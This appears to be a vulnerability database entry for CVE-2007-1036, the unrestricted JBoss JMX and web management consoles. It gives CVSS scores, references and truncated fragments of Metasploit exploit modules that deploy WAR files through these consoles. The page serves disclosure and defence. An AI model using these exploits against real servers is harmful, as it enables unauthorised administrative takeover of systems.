Published: 21/02/2007 Updated: 16/10/2018

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 760

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote malicious users to bypass authentication and gain administrative access via direct requests.

Vulnerable Product	Search on Vulmon	Subscribe to Product
jboss jboss application server

## # $Id: jboss_maindeployerrb 10754 2010-10-19 22:24:33Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' cl ...

require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvoker ...

CWE-264 http://www.securityfocus.com/archive/1/460695/100/0/threaded http://www.kb.cert.org/vuls/id/632656 http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole http://www.securitytracker.com/id?1017677 http://osvdb.org/33744 https://exchange.xforce.ibmcloud.com/vulnerabilities/32596 http://www.securityfocus.com/archive/1/460605/100/0/threaded http://www.securityfocus.com/archive/1/460597/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/16318/https://www.kb.cert.org/vuls/id/632656

CVE-2007-1036

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect